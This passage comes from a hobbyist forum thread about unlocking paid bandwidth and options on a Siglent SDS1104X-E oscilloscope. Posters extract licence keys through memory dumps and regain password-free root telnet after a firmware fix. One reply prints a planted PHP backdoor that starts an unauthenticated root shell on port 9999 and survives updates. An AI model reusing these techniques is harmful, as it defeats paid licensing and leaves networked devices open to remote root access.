Since I was connecting the scope to a wireless access point created on my computer, I just temporarily deactivated the firewall of my computer, and it still didn't work.

Quote
That means that your SHELLCMD is not taking effect. Please re-study the matter and try again.

Since I really haven't got any experience in the subject, I really don't know what to do. What could I study, what change could I make? Shouldn't your unit be the same as mine?

By the way, thank you for your help.
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #83 on: May 20, 2019, 03:36:45 pm »
It works if all is OK, including your network connection with the scope.

The easiest and most reliable way is a direct connection from the PC LAN port to the scope LAN port (this is totally hassle free).
Direct or cross cable, no need to care in modern systems.

This is just an example. You can use different IP settings that are OK in your system and for you. This 222.222.222.222 was just because I can remember it with my vintage memory and it is fast to write.

1.a Configure your scope IP settings and press save. (I even reboot; perhaps not needed, but at least some old systems need it.) (image)

1.b Configure your PC for a fixed IP with settings as for the scope. (No image because it depends on your system.)

2. Open the PC web browser and give this IP address, just the plain IP and nothing else. (image)
(The scope responds with its internal server.)
Send the command as in the image.

3. Open PuTTYtel (to avoid hassle, this is one of the most reliable, without this-and-that traps).
(Never ever use Windows' own crapjunkshit telnet.)
Write the IP and this port.
Push Open.

4. Next you see this window and  / #

5. You can command it now. Do not use the try-this-and-that-and-oops method... do not enter what you do not really know, or what is not perfectly typed or copied from a truly reliable source. One mistake and... all want to believe this never happens.

« Last Edit: May 20, 2019, 03:45:19 pm by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 
The following users thanked this post: Apofview

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #84 on: May 21, 2019, 09:54:48 pm »
Well, it finally worked. The only error was to use EasyScopeX, which apparently doesn't handle SHELLCMD. Being connected in WLAN using a wireless access point works. I used telnet from Windows and it worked very well. In fact, I don't need to anymore, because SHELLCMD apparently works.

Thank you for your help anyway!
 

Offline ScottW

  • Contributor
  • Posts: 8
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #85 on: May 24, 2019, 06:05:10 pm »
I got my 1104x-e a few days ago.  It came with firmware 8.1.6.1.26.  I had no trouble using SHELLCMD to create the memory dump, and no trouble identifying the keys via hex editor.  (I did not actually use any of the keys; I just recorded them for future use.)

Today I installed latest firmware, 6.1.33, released 2019-05-23 (yesterday).  With the new firmware, using SHELLCMD to create memory dump does nothing (no file created).  Also the SHELLCMD to start telnetd on p9999 seems to do nothing (attempt to connect via telnet client subsequently fails).

I'm assuming the codes I harvested from 6.1.26 are still valid, but unsure whether the SCPI MCBD command still works (have not tried it).

Perhaps I'm doing something wrong, but it looks to me like 6.1.33 disables the SCPI SHELLCMD, or at least blocks access to /dev/mem and telnetd.  Can anyone else confirm?
 
The following users thanked this post: plurn

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #86 on: May 24, 2019, 06:25:55 pm »
Quote
Today I installed latest firmware, 6.1.33, released 2019-05-23 (yesterday).  With the new firmware, using SHELLCMD to create memory dump does nothing (no file created).  Also the SHELLCMD to start telnetd on p9999 seems to do nothing (attempt to connect via telnet client subsequently fails).

Confirmed.

SHELLCMD is no more.

MCBD still exists.

Well, maybe it's time for a .ADS to do the memdump...  ::)
 
The following users thanked this post: ewaller

Offline vtwin@cox.net

  • Regular Contributor
  • *
  • Posts: 176
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #87 on: May 24, 2019, 06:53:44 pm »
Quote
Confirmed.
SHELLCMD is no more.

Well, that's not shocking. You know it was just a matter of time before they closed that loophole.

Larger question would be whether or not it is possible to "downgrade" to an older version of the firmware and re-gain SHELLCMD access.
A hollow voice says 'PLUGH'.
 

Offline ScottW

  • Contributor
  • Posts: 8
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #88 on: May 24, 2019, 07:13:49 pm »
Quote
Larger question would be whether or not it is possible to "downgrade" to an older version of the firmware and re-gain SHELLCMD access.

The answer is.... YES.  I was able to flash back (down) to 6.1.26 successfully and SHELLCMD again works.
 

Offline ewaller

  • Contributor
  • Posts: 30
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #89 on: May 24, 2019, 07:32:03 pm »
Quote
SHELLCMD is no more.
MCBD still exists.
Well, maybe it's time for a .ADS to do the memdump...  ::)

Well, that is too bad.  I use it to allow me to use NTP to set the clock, among other reasons aside from obtaining memory dumps.   I suppose I could just stay with the version I have.    But, I wonder if a .ADS could be crafted to open a telnet port?  Unless they have munged Bash or telnetd, it should work.   Would you be interested in working on that with me?


Edit:  I just checked the Siglent America website and checked the release notes.  It looks like they have been busy fixing bugs and adding features; stuff that makes upgrading worthwhile.  Funny thing, they don't mention disabling SHELLCMD on the release notes  ???
« Last Edit: May 24, 2019, 07:47:23 pm by ewaller »
 
The following users thanked this post: patman27

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #90 on: May 25, 2019, 09:04:35 am »
Quote
...
Today I installed latest firmware, 6.1.33, released 2019-05-23 (yesterday). ...
... it looks to me like 6.1.33 disables the SCPI SHELLCMD, or at least blocks access the /dev/mem and telnetd. ...

Thanks for finding this out. I wonder if sales of SDS1104X-E will plummet now that Siglent is trying to discourage hacking, rather than ignoring it.
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #91 on: May 25, 2019, 09:46:30 am »
Quote
... now that Siglent is trying to discourage hacking, rather than ignoring it.

they can close every hole, if they wish, at any time. All they did is disable a general security hole (open telnet, no auth to get telnet).
But as one can still downgrade (which needs physical access to the SDS, which is then not a security hole by definition), which is sufficient for all buyers to hack it, we are still safe.
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 
The following users thanked this post: Performa01, patman27

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #92 on: May 25, 2019, 09:52:03 am »
Last December, there was quite some agitation regarding network security of Siglent oscilloscopes (SDS1202X-E in that particular case). Sec Consult, a company who makes their living by finding security holes in computer systems, treated a cheap entry level lab instrument (which will usually be connected to an isolated local network only, if at all) the same way as a computer that is connected to the public internet.

The forum community here acted cool and stayed calm - except for the usual Siglent bashers - just because it's a non-issue if the instrument is properly used and then the majority of test gear out there (no matter how expensive) have similar vulnerabilities.

Nevertheless, the Sec Consult article has been spread in many online media and Siglent had to respond somehow, promising to raise the security level on their devices. This is why it has been decided to close the all too obvious and all too easily accessible backdoors.

At the same time, this latest firmware also deals with a valid complaint by several users and increased the max. length of the WiFi WPA2 PSK Key to 63 characters.

I can assure you that Siglent doesn't give a 2nd thought about students and hobbyists hacking their gear and they are not willing to put any effort in preventing that, but the bad press because of the network security issue just could not be ignored and thus had to be addressed.
 
The following users thanked this post: patman27

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #93 on: May 25, 2019, 09:58:02 am »
The SHELLCMD was more of a potential root exploit, so not a bad thing it was removed (there are still ways in, they just now require physical access). It would be like any other networked device being able to run at root with no authentication.

I suspect I was part of the reason why that command was dragged to the surface, and may have led to it being published against. If so, I do apologize, Performa01. Not being infosec, waving a flag that says here is a command that will run arbitrary code as root was not my first thought; it was more hunting for bode plot controls before I found the command to just press the buttons. And because there is no online updating, that possibility is nicely closed off.
« Last Edit: May 25, 2019, 10:12:56 am by Rerouter »
 

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #94 on: May 25, 2019, 10:35:16 am »
Quote
The SHELLCMD was more of a potential root exploit, so not a bad thing it was removed (there are still ways in, they just now require physical access). It would be like any other networked device being able to run at root with no authentication.
I suspect I was part of the reason why that command was dragged to the surface, and may have led to it being published against. If so, I do apologize, Performa01. Not being infosec, waving a flag that says here is a command that will run arbitrary code as root was not my first thought; it was more hunting for bode plot controls before I found the command to just press the buttons. And because there is no online updating, that possibility is nicely closed off.

No worries!

SEC Consult discovered the vulnerabilities in the middle of 2018 already - I think that was long before the SHELLCMD method was published here. And then it was about the SDS1202X-E, which had neither an integrated webserver nor WiFi (at least back at that time).
Half a year later, SEC Consult published their findings, because Siglent failed to respond properly (to their liking) in time. After that, Siglent was forced to do something about it, i.e. promised to close the identified security threats with the next firmware update. So you certainly need not feel bad or guilty - like you and others have said, it's not a bad thing to close backdoors that can actually be remotely accessed over the LAN.
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #95 on: May 25, 2019, 11:54:47 am »
Ok. So I have figured out a quite easy method to set up a SDS1104X-E on previous firmware *.*.6.1.26, to have password free shell access on port 9999 that survives an upgrade to 6.1.33. So I can enable shell access on 6.1.33.

Not sure I should post it here publicly now as it would be very easy to block in next update. I suppose we could pass it around by private message but that could be a hassle. What do you think - post it publicly or private message?

Also just as an aside, my 200MHz upgrade applied by licence key is still active in 6.1.33.

 
The following users thanked this post: patman27, Illusionist

Offline boblatino

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #96 on: June 04, 2019, 07:01:35 am »
Hi @Gege34, I was able to get the keys and activate all the options with the dump on my SDS1104X-E but what I found is that before the activation keys it shows 200M instead of 100M (which is what my scope is supposed to be). Does that imply that mine came already activated as a 200Mhz scope? Should I try to enter the key to change the BW?

Thanks
 
The following users thanked this post: bluejedi, Asedious

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #97 on: June 04, 2019, 09:43:00 am »
The activated option is shown two times. So if you see 200 two times, it means you have the 200MHz option activated.
Whatever the result, you can try the BW without problem.
 

Offline dalhend

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #98 on: June 09, 2019, 01:52:05 pm »
Quote
Ok. So I have figured out a quite easy method to set up a SDS1104X-E on previous firmware *.*.6.1.26, to have password free shell access on port 9999 that survives an upgrade to 6.1.33. So I can enable shell access on 6.1.33.
Not sure I should post it here publicly now as it would be very easy to block in next update. I suppose we could pass it around by private message but that could be a hassle. What do you think - post it publicly or private message?
Also just as an aside, my 200MHz upgrade applied by licence key is still active in 6.1.33.

Hi Plurn... I'd like to hear of your 6.1.33 workaround to the shellcmd issue.....  Please email me, if you feel that's best...

First post, and BTW I also thank everyone for the hints and tips to get the 1104 upgraded.  I was sidetracked along the way, but eventually focused on this and was successful.
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #99 on: June 11, 2019, 01:17:08 am »

Quote
Hi Plurn... I'd like to hear of your 6.1.33 workaround to the shellcmd issue.....
...

details supplied via personal message.
 

Offline n3mmr

  • Regular Contributor
  • *
  • Posts: 94
  • Country: se
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #100 on: June 11, 2019, 10:36:35 am »

Quote
Hi Plurn... I'd like to hear of your 6.1.33 workaround to the shellcmd issue.....
...

Quote
details supplied via personal message.

Can I also partake of your way to achieve password free telnet access in release 33?
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #101 on: June 11, 2019, 05:21:17 pm »
Quote
Can I also partake of your way to achieve password free telnet access in release 33?

details supplied via personal message.

For anyone else that wants this, I suggest request it here like n3mmr has done and anyone who has been given the details can send the details to the person requesting via personal message. Then put a note in this thread saying it has been supplied.

Just in case I am not around to provide the info.

That is just a suggestion - you can do as you please of course.
 
The following users thanked this post: RedSpanner, dalhend

Offline sundance

  • Regular Contributor
  • *
  • Posts: 55
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #102 on: June 11, 2019, 06:16:07 pm »
@plurn | n3mmr:
Mind to send me a PM?
 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #103 on: June 11, 2019, 06:47:15 pm »
@anyone who has the PM or wrote the original - can you pm timgiles :-) thank you in advance
 

Offline MikeLud

  • Regular Contributor
  • *
  • Posts: 221
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #104 on: June 11, 2019, 07:07:34 pm »
Can someone PM Plurn's workaround?

Thanks in advance
Mike
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #105 on: June 11, 2019, 09:44:31 pm »
Run the update (one time only) and do:

http://<scope_IP>/web_img/startTelnet9999.php

The rest is self-explanatory.

Made by plurn.
« Last Edit: June 14, 2019, 05:09:23 pm by tv84 »
 
The following users thanked this post: rf-loop, MT, plurn, RedSpanner, BillB, bluejedi, jousis, Manx, ScottW, melwin, Sabagmn, davor8

Offline starlight_tools

  • Contributor
  • Posts: 17
  • Country: ca
    • Starlight Tools
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #106 on: June 12, 2019, 05:20:36 am »
Plurn, I would appreciate a copy of your workaround as well please.
Walter Townsend, TTDr
 
The following users thanked this post: Higginse

Offline tek2232

  • Contributor
  • Posts: 15
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #107 on: June 12, 2019, 05:32:51 am »
Plurn can you send me a copy ?

Thanks
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #108 on: June 12, 2019, 05:51:30 am »
@ sundance timgiles MikeLud starlight_tools tek2232

details will be supplied via personal message in the next few minutes.
 
The following users thanked this post: starlight_tools, tek2232, sundance, MikeLud

Offline toodle

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #109 on: June 12, 2019, 08:57:39 pm »
Hi,
Can I also get a pm of your way to achieve password free telnet access in release 33?
Thanks in advance
 

Offline MikeLud

  • Regular Contributor
  • *
  • Posts: 221
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #110 on: June 12, 2019, 09:56:11 pm »
toodle PM sent
 

Offline Higginse

  • Newbie
  • Posts: 1
  • Country: ie
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #111 on: June 13, 2019, 08:03:57 am »
Likewise I would appreciate a copy of the workaround info if you wouldn't mind.
Thanks in advance.
 

Offline melwin

  • Contributor
  • Posts: 6
  • Country: se
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #112 on: June 13, 2019, 04:32:43 pm »
Any chance I could learn the magic incantation as well? Would be much appreciated! Thanks.
 

Offline bluejedi

  • Contributor
  • Posts: 36
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #113 on: June 14, 2019, 04:33:13 pm »
@plurn I too would appreciate a copy of the workaround info.
Thanks in advance.
« Last Edit: June 19, 2019, 10:13:03 pm by bluejedi »
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #114 on: June 14, 2019, 05:10:37 pm »
Check my previous (edited) post.
 
The following users thanked this post: patman27, bluejedi, melwin

Offline jousis

  • Newbie
  • Posts: 1
  • Country: gr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #115 on: June 14, 2019, 07:51:09 pm »
One more question, will the hack mess the SAG1021 license ?


edit. it took me a while, sorry :D
« Last Edit: June 15, 2019, 09:30:51 pm by jousis »
 
The following users thanked this post: Higginse

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #116 on: June 16, 2019, 04:35:53 pm »
The .33 firmware is annoying! There's so many extra steps to do basic things like setting probe attenuation. Before this stupid firmware, turning the dial would easily adjust. Now you have to select it, go to the next screen, select it again, and then turn the knob.  |O
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #117 on: June 16, 2019, 08:10:25 pm »
Quote
The .33 firmware is annoying! There's so many extra steps to do basic things like setting probe attenuation. Before this stupid firmware, turning the dial would easily adjust. Now you have to select it, go to the next screen, select it again, and then turn the knob.  |O

this is due to the fact that the same firmware (executable) seems to be compiled for different models, so one can find inside as well SDS5000X, SDS2000X-E, SDS1000X-E and SDS2000X+(10bit, what?), where some of these models support active probes and their information/calibration - that's why the menu has been changed

EDIT: actually a deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm
« Last Edit: June 16, 2019, 09:13:38 pm by tinhead »
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #118 on: June 16, 2019, 09:33:58 pm »
Quote
EDIT: actually a deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm

Because they are using the same source code as in the SDS5000X... Nothing more.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #119 on: June 16, 2019, 09:47:51 pm »
Quote
EDIT: actually a deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm

Oh, juicy.  :)
Actually I need MIL-1553 as an option for one of my customers classroom sets of SDS1202X-E for cadet training use.....nice to know it's part of later FW but I did suspect it was.  ;)

All we need now is to work on enabling it.  :P
Avid Rabid Hobbyist
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #120 on: June 17, 2019, 07:47:11 am »
It's fully baked in there. It's just the access chain for the menus that is missing. If you try using the specific commands you will soft lock the scope application.

They also hard coded the menu tree unlike previous versions. (I wonder why ;) ) It's not yet obvious to me where the menu / UI thread is. As I know where the menu entry points are. They are just dereferenced.

Personally I would love the option to buy the canfd decoder
 
The following users thanked this post: tautech, patman27

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #121 on: June 17, 2019, 05:47:13 pm »
Quote
EDIT: actually a deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm

Quote
Because they are using the same source code as in the SDS5000X... Nothing more.

that's right, but on the other hand what the firmware is doing depends on model name, i tried already SDS2000X-E binary on SDS1000X-E and was of course nothing special, it worked exactly as the SDS1000X-E firmware did. So vice versa it could be possible to lie about hardware version to get 2000 series features running on 1000 series.


Quote
Personally I would love the option to buy the canfd decoder

the firmware does read and evaluate at least options_canfd_cfg.bin files, once i placed it (copy of my unused wifi_cfg.bin), it immediately created options_canfd_times.txt, even if this is not available feature on 1000X-E, so the hope remains (however, there are some changes to licensing check, some extra _md5_ here and there ...)
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #122 on: June 17, 2019, 06:26:13 pm »
Quote
that's right, but on the other hand what the firmware is doing depends on model name, i tried already SDS2000X-E binary on SDS1000X-E and was of course nothing special, it worked exactly as the SDS1000X-E firmware did. So vice versa it could be possible to lie about hardware version to get 2000 series features running on 1000 series.

But the 1000 and 2000 are equal in terms of Options licenses, so not much gain there.

The big question is: did you see anywhere the use of a 5000 option in a 1000/2000 menu?

Because running the 5000 FW in the 1000 should be another ballgame...

PS: is it possible to trigger, for example,  CANFD analysis/decoding via SCPI?
« Last Edit: June 17, 2019, 06:29:08 pm by tv84 »
 

Offline bluejedi

  • Contributor
  • Posts: 36
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #123 on: June 20, 2019, 12:18:35 am »
I tried several memory dumps made via web interface/SCPI but I am unable to find my scope id in the dump. I can only find a sequence of at most 2 scope id bytes matching in memory but not more. I'm running v7.1.6.1.26 + root telnet access patch (the one that requires root pwd).

I also tried to make a dump via telnet with: cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump10.bin but this consistently fails with the following error: cat: read error: Bad address

Are there any other possibilities to extract the keys from the scope?
« Last Edit: June 20, 2019, 12:35:48 am by bluejedi »
 

Offline bluejedi

  • Contributor
  • Posts: 36
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #124 on: June 20, 2019, 12:28:30 am »
Quote
Run the update (one time only) and do:
http://<scope_IP>/web_img/startTelnet9999.php

Install the attached .ads before or after the 6.1.33 update?
« Last Edit: June 20, 2019, 12:33:01 am by bluejedi »
 

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #125 on: June 21, 2019, 01:16:06 am »
Quote
... SDS2000X+(10bit, what?), ...
...
... new 10bit DSO SDS2000XPlus ...

SDS2000X+ is the successor of the SDS2000X, currently still under development. It will not be a 10bit DSO.
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #126 on: June 21, 2019, 06:54:50 am »
Quote
Install the attached .ads before or after the 6.1.33 update?

Install the .ads after updating to 6.1.33.

To find your keys, I recommend performing a factory reset and doing the memory dump just after powering on the scope.
 
The following users thanked this post: patman27, bluejedi

Offline jemangedeslolos

  • Frequent Contributor
  • **
  • Posts: 355
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #127 on: June 21, 2019, 10:34:10 am »
Quote
... SDS2000X+(10bit, what?), ...
...
... new 10bit DSO SDS2000XPlus ...

Quote
SDS2000X+ is the successor of the SDS2000X, currently still under development. It will not be a 10bit DSO.

Hello Performa01,

Do you have additional information regarding this SDS2000X+ ??
spec ? price ?
approx release date ?

Thank you :)
 

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #128 on: June 21, 2019, 04:04:08 pm »
Quote
Do you have additional information regarding this SDS2000X+ ??

Sorry, but I don't know anything yet. All I know is that there most definitely is no 10bit scope in the pipeline.
 

Offline ffabi

  • Newbie
  • Posts: 1
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #129 on: July 04, 2019, 06:39:32 pm »
Hello @plurn or anyone that knows the workaround
Could you please send me the workaround for the .33?

Thank you very much
 

Offline Illusionist

  • Regular Contributor
  • *
  • Posts: 111
  • Country: gb
  • Why is the rum gone?
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #130 on: July 05, 2019, 11:02:45 pm »
PM sent ffabi :)
Agilent 34410A, GW Instek 8251A, Thurlby 1905A, Siglent DS1104X-E(unlocked), SDG1032X(unlocked), Micsig DP10013 MX, LeCroy PP008 500MHz Probes, Fluke 179
 

Offline crasymicci

  • Newbie
  • Posts: 1
  • Country: ru
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #131 on: July 15, 2019, 09:19:40 pm »

Hello, and for me too, please   ::)   :)
@plurn or anyone that knows the workaround,
please send me the workaround for the ..33

Very Big Thanks !
 

Offline coy

  • Newbie
  • Posts: 3
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #132 on: August 17, 2019, 11:06:19 pm »
Hey,

I just took the chance before updating to 6.1.33 and did the update of bandwidth. I used the dump created with SHELLCMD, the key was easy to find in my case and MCBD <key> worked.

Then I started the telnetd without password on port 9999, logged into the device, remounted /usr/bin/siglent as rw and put my own backdoor in the lighttpd cgi directory:

Quote
/usr/bin/siglent/config/www # cat telnetd.php
<?php
shell_exec('telnetd -l/bin/sh -p9999');
?>

Then I did the update to 6.1.33, 200M bw is kept, and backdoor still working  :)

Thanks for your investigations!
 
The following users thanked this post: patman27
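
Reply #132 above describes a PHP file placed in the scope's web server directory that kept working after the 6.1.33 update. Seen from the side of whoever administers such an instrument, one way to catch that kind of leftover is to compare a copy of the web root against a known-good manifest and flag scripts that start processes. This is an added example, not code from the thread or from Siglent; the manifest format, the function names and the sample files other than the quoted telnetd.php are constructed for illustration.

```python
"""Audit a copy of an instrument's web root for planted or modified scripts."""
import hashlib
import re
import tempfile
from pathlib import Path

# PHP constructs that start a process; backticks are PHP's shell-execution operator.
EXEC_PATTERN = re.compile(
    rb"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(|`[^`\n]+`"
)
# Daemons that hand out a shell when started from a web request.
LISTENER_PATTERN = re.compile(rb"\b(telnetd|nc|netcat|dropbear|sshd)\b")
SCRIPT_SUFFIXES = {".php", ".cgi", ".sh"}


def build_manifest(root):
    """Map relative path -> SHA-256 for every file under root (the known-good state)."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def audit_webroot(root, manifest):
    """Return a sorted list of (relative_path, finding) tuples."""
    root = Path(root)
    findings = []
    seen = set()
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        seen.add(rel)
        data = p.read_bytes()
        # Integrity: every file must be known and unchanged.
        if rel not in manifest:
            findings.append((rel, "not in manifest"))
        elif hashlib.sha256(data).hexdigest() != manifest[rel]:
            findings.append((rel, "hash mismatch"))
        # Content heuristic: still useful when no manifest was ever taken.
        if p.suffix.lower() in SCRIPT_SUFFIXES and EXEC_PATTERN.search(data):
            if LISTENER_PATTERN.search(data):
                findings.append((rel, "spawns a listener"))
            else:
                findings.append((rel, "runs a shell command"))
    for rel in manifest.keys() - seen:
        findings.append((rel, "missing from disk"))
    return sorted(findings)


def demo():
    """Constructed sample: a clean tree, then the same tree with one added and one edited file."""
    with tempfile.TemporaryDirectory() as tmp:
        www = Path(tmp) / "www"
        www.mkdir()
        (www / "index.html").write_text("<html>instrument control</html>\n")
        (www / "status.php").write_text('<?php echo "ok"; ?>\n')
        manifest = build_manifest(www)  # taken while the tree is known-good

        # Later state: the file quoted in Reply #132 plus an edited script.
        (www / "telnetd.php").write_text(
            "<?php\nshell_exec('telnetd -l/bin/sh -p9999');\n?>\n"
        )
        (www / "status.php").write_text('<?php echo "changed"; ?>\n')
        return audit_webroot(www, manifest)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{rel}: {finding}")
```

Because the post reports that the file survived the firmware update, the manifest has to come from a tree that is known to be clean, and the audit has to be repeated after each update rather than assumed from it.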

Offline KK

  • Regular Contributor
  • *
  • Posts: 100
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #133 on: October 06, 2019, 05:26:10 am »
Please PM workaround. Thanks!
 

Offline philtulju

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #134 on: October 11, 2019, 11:46:47 pm »
Hello, I'm interested in the .6.1.33 workaround!
Great discussion and lots of good information here, thanks you all.
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #135 on: October 25, 2019, 08:42:05 am »
I have the idea to buy a SDS1104X to have something to "tinker on" in my Christmas vacation.

I read all threads a year ago... and hacking was easy and a no brainer. But then I had no time for a new toy... and stuck to the scopes I could use at my work. And to be honest... these would be more than sufficient for my needs.

But nevertheless, now I'm on the jump to get one. But now after reading I'm confused. Especially because I have no scope on my bench for checking things out by myself.

So please give me some hints... if buying with hacking in mind is still an option. And I mean it as an "option" -- because I possibly wouldn't make use of that.

So... is it possible to hack the 100 MHz to 200 MHz and get the internal signal generator and the other add-ons running?

And is it possible to downgrade any FW (6.1.33 and up) to a hackable version... and then hack and upgrade back with the then activated upgrades?

Some advice would be great.

And a PM with special instructions -- if necessary -- would be appreciated.

thx
Kai
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
